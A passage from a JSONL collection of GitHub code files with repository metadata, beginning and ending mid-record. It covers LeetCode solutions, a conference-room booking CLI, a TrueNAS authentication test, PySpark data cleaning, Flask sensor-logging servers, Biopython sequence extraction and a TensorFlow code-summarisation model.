(i,j) in cache or\n board[i][j] != word[x]):\n return False\n \n cache.add((i,j))\n \n res = (dfs(i+1, j, x+1) or\n dfs(i-1, j, x+1) or\n dfs(i, j+1, x+1) or\n dfs(i, j-1, x+1))\n cache.remove((i,j))\n return res\n\n for r in range(ROWS):\n for c in range(COLS):\n if dfs(r, c, 0): return True\n\n return False\n \n\n# Runtime 7708 ms Beats 49.60%\n# Memory 16.3 MB Beats 74.74%","repo_name":"shawngonsalves/LeetCode_Challenges","sub_path":"Medium_WordSearch.py","file_name":"Medium_WordSearch.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"20"} +{"seq_id":"70812077489","text":"from datetime import timedelta\n\nfrom crbs.constants import (\n ACTION_NOT_ALLOWED,\n ALLOWED_CANCELLATION_IN_ADVANCE_MINUTES,\n ALLOWED_CANCELLATION_IN_ADVANCE_SECONDS,\n SEPARATOR,\n VALUE_PROMPT,\n END_DATETIME_PROMPT,\n START_DATETIME_PROMPT,\n)\nfrom crbs.entities import equipments\nfrom crbs.permissions import (\n 
check_if_user_allowed_to_book_room,\n check_if_user_allowed_to_see_all_bookings,\n)\nfrom crbs.utils import (\n check_booking_limit,\n create_booking,\n get_available_booking_limit_quota,\n get_available_conference_rooms,\n get_booking_details,\n get_bookings,\n get_current_datetime_ist,\n get_datetime_obj_from_str_ist,\n get_user_details,\n print_items_from_list,\n show_suitable_rooms,\n)\nfrom crbs.validations import validate_duration\n\n\ndef show_available_rooms():\n print(f\"{SEPARATOR}\\n\\t\\t\\tSHOW AVAILABLE ROOMS\\n\")\n from_datetime = input(START_DATETIME_PROMPT)\n to_datetime = input(END_DATETIME_PROMPT)\n from_datetime_obj_ist = get_datetime_obj_from_str_ist(from_datetime)\n to_datetime_obj_ist = get_datetime_obj_from_str_ist(to_datetime)\n validate_duration(from_datetime_obj_ist, to_datetime_obj_ist, True)\n available_rooms = get_available_conference_rooms(\n from_datetime_obj_ist, to_datetime_obj_ist\n )\n print_items_from_list(\"Available Rooms\", available_rooms)\n\n\ndef find_and_book_suitable_room(user_id):\n print(f\"{SEPARATOR}\\n\\t\\t\\tFIND SUITABLE ROOMS\\n\")\n user_details = get_user_details(user_id)\n available_booking_limit = get_available_booking_limit_quota(\n user_details[\"organization_id\"]\n )\n print(\n f\"\\n\\t\\t\\tAvailable monthly conference room booking quota \"\n f\"for your organization is : {available_booking_limit} hours\"\n )\n from_datetime = input(START_DATETIME_PROMPT)\n to_datetime = input(END_DATETIME_PROMPT)\n from_datetime_obj_ist = get_datetime_obj_from_str_ist(from_datetime)\n to_datetime_obj_ist = get_datetime_obj_from_str_ist(to_datetime) + timedelta(\n seconds=-1\n )\n validate_duration(from_datetime_obj_ist, to_datetime_obj_ist, True)\n capacity = int(input(\"\\t\\t\\tEnter value for capacity : \"))\n print(\n \"\\t\\t\\tEnter the required equipment ids from followings (comma separated, example : 1,3)\"\n )\n for equipment in equipments:\n print(\"\\t\\t\\t\\tID : {}, Name : {}\".format(equipment[\"id\"], equipment[\"name\"]))\n required_equipments = input(\"\\t\\t\\tValue for equipments ids : \")\n required_equipments = (\"\".join(required_equipments.split())).split(\",\")\n required_equipments = list(map(int, required_equipments))\n available_rooms = get_available_conference_rooms(\n from_datetime_obj_ist, to_datetime_obj_ist, capacity, required_equipments\n )\n if not available_rooms:\n print(\n \"\\t\\t\\t\\tNo rooms available for selected date time. Checking for next available slots\\n\"\n )\n for _ in range(4):\n from_datetime_obj_ist = from_datetime_obj_ist + timedelta(hours=1)\n to_datetime_obj_ist = to_datetime_obj_ist + timedelta(hours=1)\n available_rooms = get_available_conference_rooms(\n from_datetime_obj_ist,\n to_datetime_obj_ist,\n capacity,\n required_equipments,\n )\n if available_rooms:\n break\n if not available_rooms:\n print(\"\\t\\t\\t\\tNo rooms available. 
Please try for some other dates/time\\n\")\n return\n show_suitable_rooms(available_rooms)\n allowed_booking_by_user = check_if_user_allowed_to_book_room(user_id)\n if allowed_booking_by_user:\n booking_allowed, reason = check_booking_limit(\n user_details[\"organization_id\"], from_datetime_obj_ist, to_datetime_obj_ist\n )\n if not booking_allowed:\n print(reason)\n else:\n print(\n f\"\\t\\t\\tKindly enter the serial number to book a conference room from above options\"\n )\n print(\"\\t\\t\\t\\tEnter 0 to go to main menu\\n\")\n choice = int(input(VALUE_PROMPT))\n if choice == 0:\n return\n elif choice <= len(available_rooms):\n booking_details = {\n \"room_id\": available_rooms[choice - 1][\"id\"],\n \"from_datetime\": from_datetime_obj_ist,\n \"to_datetime\": to_datetime_obj_ist,\n \"booked_by\": user_id,\n \"organization_id\": user_details[\"organization_id\"],\n }\n booked, info = create_booking(\n booking_details, capacity, required_equipments\n )\n if booked:\n print(f\"\\n\\t\\t\\tBooking successful, Booking id is : {info}\")\n else:\n print(\n f\"\\n\\t\\t\\tBooking failed, Reason : {info}\\n\\t\\t\\tPlease try to book some other room.\"\n )\n\n\ndef cancel_a_booking(user_id):\n print(f\"{SEPARATOR}\\n\\t\\t\\tCANCEL BOOKING\\n\")\n filters = {\"user_id\": user_id}\n user_bookings = get_bookings(**filters)\n print_items_from_list(\"Your booking details\", user_bookings)\n booking_id = int(input(f\"\\n\\t\\t\\tEnter the booking id to cancel a booking : \"))\n booking_details = get_booking_details(booking_id)\n now_datetime = get_current_datetime_ist()\n if (\n int((booking_details[\"from_datetime\"] - now_datetime).total_seconds())\n > ALLOWED_CANCELLATION_IN_ADVANCE_SECONDS\n ):\n booking_details.update({\"cancelled\": True})\n print(f\"\\n\\t\\t\\tCancellation successful\")\n else:\n print(\n f\"\\n\\t\\t\\tSorry!\\n\\t\\t\\tCancellation is allowed before {ALLOWED_CANCELLATION_IN_ADVANCE_MINUTES}\"\n f\" minutes before the start time of the booking\"\n )\n\n\ndef show_all_bookings(user_id):\n print(f\"{SEPARATOR}\\n\\t\\t\\tLIST ALL BOOKINGS\\n\")\n from_datetime = input(START_DATETIME_PROMPT)\n to_datetime = input(END_DATETIME_PROMPT)\n from_datetime_obj_ist = get_datetime_obj_from_str_ist(from_datetime)\n to_datetime_obj_ist = get_datetime_obj_from_str_ist(to_datetime) + timedelta(\n seconds=-1\n )\n validate_duration(from_datetime_obj_ist, to_datetime_obj_ist, False)\n print(f\"\\n\\t\\t\\tEnter 1 to see all bookings done by you\")\n print(\"\\t\\t\\tEnter 2 to see all bookings for your organization\")\n print(\"\\t\\t\\tEnter the user id to see all bookings done by that user\")\n integer_value = int(input(VALUE_PROMPT))\n filters = {\n \"from_datetime_obj_ist\": from_datetime_obj_ist,\n \"to_datetime_obj_ist\": to_datetime_obj_ist,\n }\n if integer_value == 1:\n filters.update({\"user_id\": user_id})\n bookings = get_bookings(**filters)\n else:\n allowed = check_if_user_allowed_to_see_all_bookings(user_id)\n if not allowed:\n print(ACTION_NOT_ALLOWED)\n return\n user_org_id = get_user_details(user_id)[\"organization_id\"]\n if integer_value == 2:\n filters.update({\"organization_id\": user_org_id})\n bookings = get_bookings(**filters)\n else:\n other_user_org_id = get_user_details(integer_value)[\"organization_id\"]\n if (\n user_org_id == other_user_org_id\n ): # check to see if user belong to same organization\n filters.update({\"user_id\": integer_value})\n bookings = get_bookings(**filters)\n else:\n print(ACTION_NOT_ALLOWED)\n return\n print_items_from_list(\"Booking 
details\", bookings)\n","repo_name":"techieaman94/conference-room-booking-system","sub_path":"crbs/user_functionalities.py","file_name":"user_functionalities.py","file_ext":"py","file_size_in_byte":7615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"25275340004","text":"import json\nimport shlex\n\nimport pytest\n\nfrom middlewared.test.integration.assets.account import user\nfrom middlewared.test.integration.utils import ssh\n\n\n@pytest.mark.parametrize(\"url\", [\"127.0.0.1\", \"127.0.0.1:6000\"])\n@pytest.mark.parametrize(\"root\", [True, False])\ndef test_tcp_connection_from_localhost(url, root):\n cmd = f\"midclt -u ws://{url}/websocket call auth.sessions '[[\\\"current\\\", \\\"=\\\", true]]' '{{\\\"get\\\": true}}'\"\n if root:\n assert json.loads(ssh(cmd))[\"credentials\"] == \"ROOT_TCP_SOCKET\"\n else:\n with user({\n \"username\": \"unprivileged\",\n \"full_name\": \"Unprivileged User\",\n \"group_create\": True,\n \"password\": \"test1234\",\n }):\n result = ssh(f\"sudo -u unprivileged {cmd}\", check=False, complete_response=True)\n assert \"Not authenticated\" in result[\"stderr\"]\n","repo_name":"truenas/middleware","sub_path":"tests/api2/test_ip_auth.py","file_name":"test_ip_auth.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":2144,"dataset":"github-code","pt":"20"} +{"seq_id":"33297810302","text":"import pyspark.sql.functions as F\nfrom pyspark.sql import SparkSession\nfrom scipy import rand\n\nfrom util.data import process_value_list_str\n\n\ndef drop_unnecessary_columns(df):\n columns_to_drop = [\n 'TEMP_ave', # Entirely empty\n\n 'Shape',\n 'Neighbour_Shape',\n ]\n df = df.drop(*columns_to_drop)\n\n return df\n\n\ndef process_timestamp(df):\n # Assuming acq_date is already in date format. 
If not, convert it using to_date function\n df = df.withColumn('acq_date', F.to_date(F.col('acq_date'), 'yyyy-MM-dd'))\n\n # Extract year, month, day\n df = df.withColumn('acq_year', F.year('acq_date'))\n df = df.withColumn('acq_month', F.month('acq_date'))\n df = df.withColumn('acq_day', F.dayofmonth('acq_date'))\n\n # Extract day_of_the_week (1 - Sunday, 7 - Saturday)\n df = df.withColumn('acq_day_of_the_week', F.dayofweek('acq_date'))\n\n # Extract day_of_the_month\n df = df.withColumn('acq_day_of_the_month', F.dayofmonth('acq_date'))\n\n # Create separate columns for each season\n df = df.withColumn('acq_spring', F.when((F.col('acq_month').between(3, 5)), 1).otherwise(0))\n df = df.withColumn('acq_summer', F.when((F.col('acq_month').between(6, 8)), 1).otherwise(0))\n df = df.withColumn('acq_fall', F.when((F.col('acq_month').between(9, 11)), 1).otherwise(0))\n df = df.withColumn('acq_winter', F.when((F.col('acq_month').isin([12, 1, 2])), 1).otherwise(0))\n\n # Drop the original 'acq_date' column\n df = df.drop('acq_date')\n\n return df\n\n\ndef process_list_str_columns(df):\n df = df.withColumn(\"frp\", process_value_list_str(F.col(\"frp\")))\n df = df.withColumn(\"acq_time\", process_value_list_str(F.col(\"acq_time\")))\n df = df.withColumn(\"Neighbour_frp\", process_value_list_str(F.col(\"Neighbour_frp\")))\n df = df.withColumn(\"Neighbour_acq_time\", process_value_list_str(F.col(\"Neighbour_acq_time\")))\n\n return df\n\n\ndef remove_outliers(df):\n print(f\"# of rows before removing outliers: {df.count():,}\")\n\n # Manual list of numerical columns\n numerical_columns = [\"frp\"]\n\n # Automatically filter numerical columns based on DataFrame schema\n # numerical_columns = [field.name for field in df.schema.fields if field.dataType in (FloatType(), DoubleType(), IntegerType(), LongType())]\n\n no_outliers_df = df\n for column in numerical_columns:\n # Calculate Q1, Q3, and IQR\n quantiles = no_outliers_df.approxQuantile(column, [0.25, 0.75], 0.05)\n q1, q3 = quantiles[0], quantiles[1]\n iqr = q3 - q1\n\n # Define the lower and upper range for non-outliers\n lower_range = q1 - 1.5 * iqr\n upper_range = q3 + 1.5 * iqr\n\n # Remove outliers\n no_outliers_df = no_outliers_df.filter((F.col(column) >= lower_range) & (F.col(column) <= upper_range))\n\n print(f\"# of rows after removing outliers: {df.count():,}\")\n\n return no_outliers_df\n\n\ndef drop_empty_rows(df):\n # Count the number of rows with an empty value in any column\n num_rows_with_empty_value = df.where(\" or \".join([f\"{c} IS NULL\" for c in df.columns])).count()\n\n print(f'# of rows with an empty value in any column: {num_rows_with_empty_value:,}')\n print(f'# of rows without an empty value in any column: {df.count() - num_rows_with_empty_value:,}')\n print(f'Percentage of rows with an empty value in any column: {num_rows_with_empty_value / df.count() * 100.0:,}')\n\n # Remove the rows with an empty value in any column\n df = df.dropna(subset=None)\n\n return df\n\n\ndef randomly_sample(df):\n # Randomly sample the dataset\n df = df.orderBy(rand()).limit(int(df.count() * 0.01)) # sampling\n\n # Show the new number of rows\n print(\"Number of rows after sampling:\", df.count())\n\n return df\n\n\nif __name__ == '__main__':\n # Initialize Spark session\n spark = SparkSession.builder \\\n .appName(\"Clean Data\") \\\n .config(\"spark.driver.memory\", \"20g\") \\\n .getOrCreate()\n\n # Load data\n df = spark.read.parquet(f\"../tmp/datasets/original\")\n\n df = drop_unnecessary_columns(df)\n df = 
process_list_str_columns(df)\n df = process_timestamp(df)\n df = remove_outliers(df)\n df = drop_empty_rows(df)\n # df = randomly_sample(df)\n\n # Coalesce the DataFrame into a single partition\n df = df.coalesce(1)\n\n # Save the cleaned datasets as a Parquet file\n df.write.mode(\"overwrite\").parquet('../tmp/datasets/processed')\n\n # Stop the Spark session\n spark.stop()\n","repo_name":"ivantha/wildfire-project","sub_path":"scripts/4_1_create_processed_dataset.py","file_name":"4_1_create_processed_dataset.py","file_ext":"py","file_size_in_byte":4435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"40512272033","text":"import tensorflow as tf\nimport numpy as np\n\nsess = tf.Session()\n\na = tf.placeholder(dtype=tf.float16, shape=[2, 2],name='a')\nb = tf.placeholder(dtype=tf.float16, shape=[2, 2],name='b')\n\nadd = tf.add(a, b)\nsess = tf.Session()\nret = sess.run(add, feed_dict={a: np.random.randint(0, 10, size=(2, 2)), b: np.random.randint(0, 10, size=(2, 2))})\nprint(ret)\nsave_path = 'saver/fns.ckpt'\n\n#Create a saver\n\n'''python v1 = tf.Variable(..., name='v1') v2 = tf.Variable(..., name='v2')\n# Pass the variables as a dict: saver = tf.train.Saver({'v1': v1, 'v2': v2})\n# Or pass them as a list. saver = tf.train.Saver([v1, v2]) \n# Passing a list is equivalent to passing a dict with the variable op names \n# as keys: saver = tf.train.Saver({v.op.name: v for v in [v1, v2]}) '''\nv1 = tf.Variable(0, name='v1')\nv2 = tf.Variable(0, name='v2')\nsaver=tf.train.Saver(var_list=[v1])\n#Launch the graph and train, saving the model every 1,000 steps.\n\nres = saver.save(sess, save_path)\n","repo_name":"softpo/fast-style-transfer-softpo","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"27563028814","text":"\"\"\"\n0623: 第31题\n给定一个列表,要求每一位都是所给数字的最小值\n如果没有比当前的排列更大的排列了(如 3 2 1这样最后的排列),就返回最小的排列(比如 1 2 3)\n\n(1): 1,2,3 → 1,3,2\n(2): 3,2,1 → 1,2,3\n(3): 1,1,5 → 1,5,1\n\"\"\"\n\n\"\"\"\n目标:\n 在输入的数字中,如果前一位数字大于当前数字,则进行调换顺序\n 并将其后面的全部逆序 \n\"\"\"\n\nclass Solution:\n def nextPermutation(self, nums):\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n stack = []\n i = len(nums) - 1 # i = 2, nums = [1, 2, 3]\n while i > -1:\n # nums[i], nums[stack[-1]]: 前一位是不是小于后一位\n if stack and nums[i] < nums[stack[-1]]:\n pivot = stack.pop()\n\n while stack and nums[i] < nums[stack[-1]]:\n pivot = stack.pop()\n\n nums[i], nums[pivot] = nums[pivot], nums[i]\n break\n\n stack.append(i)\n i -= 1\n nums[i + 1:] = nums[i + 1:][::-1] # i+1 之后所有字符调换顺序\n\n\n\"\"\"\n(1) stack = [2], i -= 1, i = 1\n(2) nums[1] = 2, stack[-1] = 2, nums[2] = 3, i = 1 \n 2 < 3:\n pivot = stack.pop() = 2\n stack = []\n nums[i] = 2, nums[pivot] = nums[2] = 3\n nums = [1, 3, 2]\n(3)nums[i+1:] = nums[2:] = nums[2:][::-1] = ''\n\"\"\"\n\ns = Solution()\nnums = [1, 3, 6, 4]\ns.nextPermutation(nums)\nprint(nums)\n","repo_name":"YuHe0108/LeetCode","sub_path":"other/31. Next Permutation.py","file_name":"31. 
Next Permutation.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"4206972175","text":"# verification-helper: PROBLEM https://judge.yosupo.jp/problem/unionfind\nimport sys\nfrom library.union_find import UnionFind\n\ninput = sys.stdin.readline\n\nN, Q = map(int, input().split())\nuf = UnionFind(N)\nfor _ in range(Q):\n t, u, v = map(int, input().split())\n if t == 0:\n uf.unite(u, v)\n else:\n print(1 if uf.same(u, v) else 0)\n","repo_name":"tera-saki/atcoder-templates","sub_path":"tests/yosupo/union_find.test.py","file_name":"union_find.test.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"16145555328","text":"from flask import Flask, request, redirect, send_file\nimport json, os\nfrom datetime import datetime\nimport sensor_graph\n\n# 初期設定 --- (※1)\njsonfile = 'sensor.json'\npngfile = 'sensor.png'\napp = Flask(__name__) # Flaskを生成\n\n# サーバーのルートにアクセスがあった時 --- (※2)\n@app.route('/')\ndef index():\n return \"/save or /graph\"\n\n# JSONファイルを元にグラフを描画 --- (※3)\n@app.route('/graph')\ndef graph():\n sensor_graph.draw_file(jsonfile, pngfile)\n # 描画したファイルを出力 --- (※4)\n return send_file(pngfile, mimetype='image/png')\n\n# センサーの値を保存する --- (※5)\n@app.route('/save')\ndef save():\n # 投稿されたデータを取得する --- (※6)\n t = request.args.get('t', '') # 温度\n h = request.args.get('h', '') # 湿度\n c = request.args.get('c', '') # CPU温度\n if t == '' or h == '' or c == '': return 'False'\n dt = datetime.now().strftime('%Y/%m/%d %H:%M:%S')\n # 取得した値をJSONに書き込む --- (※7)\n data = []\n if os.path.exists(jsonfile):\n with open(jsonfile, encoding='utf-8') as fp:\n data = json.load(fp)\n data.append({\n 'time': dt, \n 'temp': float(t), \n 'humi': float(h),\n 'cpu': float(c),\n })\n with open(jsonfile, 'w', encoding='utf-8') as fp:\n json.dump(data, fp)\n return 'True'\n\nif __name__ == '__main__': # サーバー起動 --- (※8)\n app.run('0.0.0.0', 8889, debug=True)\n\n","repo_name":"kujirahand/book-json-sample","sub_path":"src/ch3/get_sensor_server.py","file_name":"get_sensor_server.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"ja","doc_type":"code","stars":15,"dataset":"github-code","pt":"20"} +{"seq_id":"25431849498","text":"import numpy as np\n\n\ndef get_input(filename):\n with open(filename) as file:\n lines = file.read().splitlines()\n points = []\n steps = []\n line = lines.pop(0)\n while len(line) > 0:\n points.append([int(value) for value in line.split(',')])\n line = lines.pop(0)\n for line in lines:\n step = []\n if 'x' in line:\n step.append('left')\n else:\n step.append('up')\n step.append(int(line.split('=')[1]))\n steps.append(step)\n return points, steps\n\n\ndef print_points(points):\n max_x = max([point[0] for point in points]) + 1\n max_y = max([point[1] for point in points]) + 1\n for y in range(max_y):\n for x in range(max_x):\n if [x, y] in points:\n print('#', end='')\n else:\n print('.', end='')\n print()\n print()\n\n\ndef main():\n points, steps = get_input('input.txt')\n for direction, value in steps:\n new_points = []\n for point in reversed(points):\n x, y = point\n if direction == 'left' and x > value:\n new_point = [value - (x - value), y]\n points.remove(point)\n if new_point not in points:\n new_points.append(new_point)\n elif direction == 'up' and y > value:\n points.remove(point)\n new_point = [x, value - (y - value)]\n if new_point not in points:\n 
new_points.append(new_point)\n points += new_points\n print_points(points)\n\n\nmain()\n","repo_name":"zackjohnson298/AdventOfCode","sub_path":"2021/Day13/Part2.py","file_name":"Part2.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"8715654183","text":"from Bio import Entrez, SeqIO\n\nEntrez.email = \"benjamin.r.jack@gmail.com\"\n\n# Download T7 wild-type and E. coli K12 genbank records\nhandle = Entrez.efetch(db=\"nuccore\", id=[\"NC_001604\"], rettype=\"gb\", retmode=\"text\")\n\nrecords = SeqIO.parse(handle, \"genbank\")\n\noutfile = open(\"T7polycistron.fasta\", \"w\")\n\n# Set starting and ending genes for polycistronic transcript\nstart_gene = \"T7p44\"\nend_gene = \"T7p46\"\n\nfor record in records:\n\n for feature in record.features:\n # Grab coding sequences\n if feature.type == \"CDS\":\n # Everything should have a locus tag\n if \"locus_tag\" in feature.qualifiers:\n id = feature.qualifiers[\"locus_tag\"][0]\n # Check to see if this is the gene that we are starting or ending\n # with\n if id == start_gene:\n start = feature.location.start.position\n elif id == end_gene:\n end = feature.location.end.position\n else:\n continue\n\n\n# Grab sequence based on ranges colected above\ndna = record.seq[start:end]\n# Write out the file\nout = \">\" + start_gene + \":\" + end_gene + \"\\n\" + str(dna)\noutfile.write(out)\noutfile.close()\nhandle.close()\n","repo_name":"benjaminjack/phage_attenuation","sub_path":"scripts/python/extract_polycistronic_transcript.py","file_name":"extract_polycistronic_transcript.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"23344993139","text":"from vectorizer.model.config import *\n\nimport tensorflow as tf\n# from vectorizer.model.sampling import makeDataSet, padListsToMatrix, removeLeaveNodePadEmbeddings, \\\n# removeMidNodePadEmbeddings\nfrom vectorizer.model.constVariable import *\nfrom vectorizer.model.sampling import *\nfrom vectorizer.parameters import NUM_FEATURES # 中间节点向量的维度\nimport pickle\n\n\nclass ASTNN:\n def __init__(self):\n # 定义编码器所使用的的神经元\n self.encode_cell_fw = tf.nn.rnn_cell.BasicLSTMCell(HIDDEN_SIZE)\n self.encode_cell_bw = tf.nn.rnn_cell.BasicLSTMCell(HIDDEN_SIZE)\n\n # 定义解码器所使用的LSTM结构\n self.dec_cell = tf.nn.rnn_cell.MultiRNNCell(\n [\n tf.nn.rnn_cell.BasicLSTMCell(HIDDEN_SIZE)\n for _ in range(NUM_LAYER)\n ]\n )\n\n # 为中间节点,叶子节点,函数名节点分别定义词向量\n self.leaveEmbedding = tf.get_variable(\n \"leave\", [LEAVE_VOCAB_SIZE, HIDDEN_SIZE]\n )\n self.targetEmbedding = tf.get_variable(\n \"target\", [TAR_VOCAB_SIZE, HIDDEN_SIZE]\n )\n\n # 中间节点向量矩阵通过Word2vect预训练得到,直接从外存读入\n with open(midNodeEmbeddingPath, \"rb\") as f:\n embeddingAndDicTuple = pickle.load(f)\n self.midNodeEmbedding = embeddingAndDicTuple[0]\n\n # 定义处理合并向量的矩阵以及bias\n self.merge_weight = tf.get_variable(\n \"merge_weight\", [HIDDEN_SIZE + NUM_FEATURES, HIDDEN_SIZE]\n )\n self.merge_bias = tf.get_variable(\n \"merge_bias\", [HIDDEN_SIZE]\n )\n\n # 定义softmax层变量\n if SHARE_EMB_AND_SOFTMAX:\n self.softmax_weight = tf.transpose(self.targetEmbedding)\n else:\n self.softmax_weight = tf.get_variable(\n \"weight\", [HIDDEN_SIZE, TAR_VOCAB_SIZE]\n )\n self.softmax_bias = tf.get_variable(\n \"bias\", [TAR_VOCAB_SIZE]\n )\n\n def forward(self, midNodeList, leaveList, STNum, trgInput, trgLabel,\n trg_size):\n # 对矩阵进行填充得到规范矩阵\n midNodeListPad, leaveNodeListPad, trgInputPad, trgLabelPad = 
\\\n padListsToMatrix(midNodeList, leaveList, trgInput, trgLabel, STNum)\n\n # 获得中间节点向量矩阵 batchSize * statementLen * maxListLen * NUM_FEATURES\n # maxListLen为每个batch中最长list的维度\n midNodeEmbedding = tf.nn.embedding_lookup(self.midNodeEmbedding, midNodeListPad)\n\n # 获得叶子节点向量矩阵 batchSize * statementLen * maxListLen * HIDDEN_SIZE\n leaveEmbedding = tf.nn.embedding_lookup(self.leaveEmbedding, leaveNodeListPad)\n\n # 获得目标向量的矩阵 batchSize * statementLen * maxListLen * HIDDEN_SIZE\n trgEmbedding = tf.nn.embedding_lookup(self.targetEmbedding, trgInputPad)\n\n # 将填充的向量设置为零向量\n\n # 根据midNodeList创建一个矩阵,矩阵的每个维度的大小是列表中的最高维度的大小,\n # 得到的矩阵包含两个值0,以及向量的大小\n # 如果是0,则该位置经过mask变换后将形成一个0向量\n # 若是向量的大小,经过mask变换后将保留原先向量的值\n midNodemaskInput = removeMidNodePadEmbeddingsMaskInput(midNodeList, NUM_FEATURES)\n leaveNodemaskInput = removeLeaveNodePadEmbeddingsMaskInput(leaveList, HIDDEN_SIZE)\n\n midNodeMask = tf.sequence_mask(midNodemaskInput, NUM_FEATURES, dtype=tf.float32)\n leaveNodeMask = tf.sequence_mask(leaveNodemaskInput, HIDDEN_SIZE, dtype=tf.float32)\n\n midNodeEmbeddingRemovePad = midNodeEmbedding * midNodeMask\n leaveEmbeddingRemovePad = leaveNodeMask * leaveEmbedding\n\n # 在词向量上进行dropout\n midNodeEmbedding = tf.nn.dropout(midNodeEmbeddingRemovePad, KEEP_PROB)\n leaveEmbedding = tf.nn.dropout(leaveEmbeddingRemovePad, KEEP_PROB)\n\n # 对特征进行累加求和\n midNodeEmbedding = tf.reduce_sum(midNodeEmbedding, axis=2)\n leaveEmbedding = tf.reduce_sum(leaveEmbedding, axis=2)\n\n # 对midEmbedding以及leaveEmbedding进行拼接 batchSize * STLen * (NUM_FEATURES + HIDDEN_SIZE)\n mergeEmbedding = tf.concat([midNodeEmbedding, leaveEmbedding], 2)\n\n # 将合并的向量维度转化成HIDDEN_SIZE,\n rnnEmbedding = tf.tanh(tf.matmul(mergeEmbedding, self.merge_weight) + self.merge_bias)\n\n # 构造双向循环神经网络编码器\n # 这里的time step就是statement子树的个数\n with tf.variable_scope(\"encoder\"):\n enc_outputs, enc_states = tf.nn.bidirectional_dynamic_rnn(\n self.encode_cell_fw, self.encode_cell_bw, rnnEmbedding, STNum, dtype=tf.float32\n )\n\n # 将两个LSTM的输出拼接为一个张量\n enc_outputs = tf.concat([enc_outputs[0], enc_outputs[1]], -1)\n\n with tf.variable_scope(\"decoder\"):\n attention_mechanism = tf.contrib.seq2seq.BahdanauAttention(\n HIDDEN_SIZE, enc_outputs, memory_sequence_length=STNum\n )\n\n # 将解码器的循环神经网络self.dec_cell和注意力一起封装成更高层次的循环神经网络\n attention_cell = tf.contrib.seq2seq.AttentionWrapper(\n self.dec_cell, attention_mechanism, attention_layer_size=HIDDEN_SIZE\n )\n\n dec_outputs, _ = tf.nn.dynamic_rnn(\n attention_cell, trgEmbedding, trg_size, dtype=tf.float32\n )\n\n # 计算解码器的log perplexity\n output = tf.reshape(dec_outputs, [-1, HIDDEN_SIZE])\n logits = tf.matmul(output, self.softmax_weight) + self.softmax_bias\n loss = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=tf.reshape(trgLabelPad, [-1]), logits=logits)\n\n # 在计算平均损失时,需要将填充位的权重设置为0,以避免无效位置的预测干扰\n # 模型的训练\n\n label_weights = tf.sequence_mask(\n trg_size, maxlen=len(trgLabel[0]), dtype=tf.float32\n )\n label_weights = tf.reshape(label_weights, [-1])\n cost = tf.reduce_sum(loss * label_weights)\n cost_per_token = cost / tf.reduce_sum(label_weights)\n\n # 定义反向传播操作\n trainable_variables = tf.trainable_variables()\n grads = tf.gradients(cost / tf.to_float(BATCH_SIZE), trainable_variables)\n grads, _ = tf.clip_by_global_norm(grads, MAX_GRAD_NORM)\n\n optimizer = tf.train.AdamOptimizer(learning_rate=LEARNING_RATE)\n train_op = optimizer.apply_gradients(zip(grads, trainable_variables))\n\n return cost_per_token, train_op\n\n def run_epoch(self, session, cost_op, train_op, saver, step):\n # 训练一个epoch\n # 
重复训练步骤直至遍历完所有的数据\n while True:\n try:\n # 运行train_op并计算损失值\n cost, _ = session.run([cost_op, train_op])\n\n # 每处理100个batch打印一下损失值\n if step % 10 == 0:\n print(\"After %d steps ,per token cost is %.3f\" % (step, cost))\n\n # 每1000步保存一个checkpoint\n if step % 100 == 0:\n saver.save(session, CHECKPOINT_PATH, global_step=step)\n step += 1\n except tf.errors.OutOfRangeError:\n break\n return step\n\n def main(self):\n initializer = tf.contrib.layers.variance_scaling_initializer(factor=1.0, mode='FAN_OUT', uniform=True)\n\n # 定义训练用的循环神经网络模型\n with tf.variable_scope(\"astnn\", reuse=None, initializer=initializer):\n train_model = ASTNN()\n\n # 定义输入数据,sample操作\n sample_gen = batchSamples(BATCH_SIZE)\n midNodeList, midNodesListLen, leaveList, leaveNodesListLen, STNum, trgInput, trgLabel, trgSize = sample_gen.__next__()\n\n # 定义前向计算图\n cost_op, train_op = train_model.forward(midNodeList, leaveList, STNum, trgInput, trgLabel,\n trgSize)\n\n # 训练模型\n saver = tf.train.Saver()\n step = 1\n\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n for i in range(NUM_EPOCH):\n print(\"In iteration : %d\" % (i + 1))\n step = self.run_epoch(sess, cost_op, train_op, saver, step)\n\n\nif __name__ == \"__main__\":\n astnn = ASTNN()\n astnn.main()\n","repo_name":"zhichengshi/extractASTFromXml","sub_path":"vectorizer/model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"6621077526","text":"import pathlib\nfrom datetime import datetime\nfrom flask import Flask\n\n\n_ROOT_DIR = pathlib.Path(__file__).absolute().parent.parent\n_INDEX_HTML = '''\n\n \n \n
    \n {users}\n    
\n \n\n'''\n_USER_LINE_HTML = '''\n
  • user {user_id}
  • \n'''\n_USER_PAGE_HTML = '''\n\n \n Brain Computer Interface: User {user_id}\n \n \n \n {thoughts}\n
